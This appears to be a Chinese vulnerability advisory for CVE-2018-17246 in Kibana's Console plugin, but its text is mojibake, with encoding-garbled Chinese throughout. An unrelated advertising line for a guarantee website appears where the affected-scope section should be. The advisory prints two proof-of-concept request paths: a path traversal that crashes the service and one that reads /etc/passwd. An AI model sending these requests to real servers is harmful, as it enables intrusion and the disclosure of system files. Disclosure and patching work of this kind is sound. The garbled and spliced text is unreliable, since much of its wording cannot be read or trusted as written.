Elasticsearch Kibana Console²å¼þÏÂÁîÖ´ÐÐÎó²îÇ徲ͨ¸æ

Ðû²¼Ê±¼ä 2018-12-20

Îó²î±àºÅºÍ¼¶±ð


CVE±àºÅ£ºCVE-2018-17246£¬£¬£¬£¬£¬£¬£¬Î£ÏÕ¼¶±ð£ºÖÐΣ£¬£¬£¬£¬£¬£¬£¬CVSS·ÖÖµ£º³§ÉÌ×ÔÆÀ 6.3£¬£¬£¬£¬£¬£¬£¬¹Ù·½Î´ÆÀ¶¨


Ó°Ïì°æ±¾


ElasticSearch Kibana <6.4.3

ElasticSearch Kibana <5.6.13


Îó²î¸ÅÊö


Elasticsearch Kibana£¨Ç°³Æelasticsearch-dashboard£©ÊǺÉÀ¼Elasticsearch¹«Ë¾µÄÒ»Ì׿ªÔ´µÄ¡¢»ùÓÚä¯ÀÀÆ÷µÄÆÊÎöºÍËÑË÷ElasticsearchÒDZí°å¹¤¾ß¡£¡£¡£ConsoleÊÇÆäÖеÄÒ»¸ö¿ØÖÆÌ¨²å¼þ¡£¡£¡£


Elasticsearch Kibana 6.4.3֮ǰ°æ±¾ºÍ5.6.13֮ǰ°æ±¾ÖеÄConsole²å¼þ±£´æÇå¾²Îó²î¡£¡£¡£¹¥»÷Õß¿Éͨ¹ý·¢ËÍÇëÇóʹÓøÃÎó²îÔÚÖ÷»ú²Ù×÷ϵͳÉÏÒÔKibanaÀú³ÌȨÏÞÖ´ÐÐí§ÒâÏÂÁî¡£¡£¡£


Ó°Ïì¹æÄ£


¼øºÚµ£±£Íø(jhdbw)¡¤×î¾ßȨÍþΨһάȨµ£±£Æ½Ì¨



Îó²îÑéÖ¤


POC/EXP£º

¾Ü¾øÐ§ÀÍ£¬£¬£¬£¬£¬£¬£¬¹¥»÷ÏòÁ¿ÈçÏ£º

/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../cli_plugin/index


í§ÒâÎļþ¶ÁÈ¡£¬£¬£¬£¬£¬£¬£¬¹¥»÷ÏòÁ¿ÈçÏ£º

/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd


ÐÞ¸´½¨Òé


ÏÖÔÚ³§ÉÌÒÑÐû²¼Éý¼¶²¹¶¡ÒÔÐÞ¸´Îó²î£¬£¬£¬£¬£¬£¬£¬²¹¶¡»ñÈ¡Á´½Ó:

https://access.redhat.com/security/cve/cve-2018-17246


²Î¿¼Á´½Ó


https://access.redhat.com/security/cve/cve-2018-17246

http://www.cnvd.org.cn/flaw/show/CNVD-2018-23907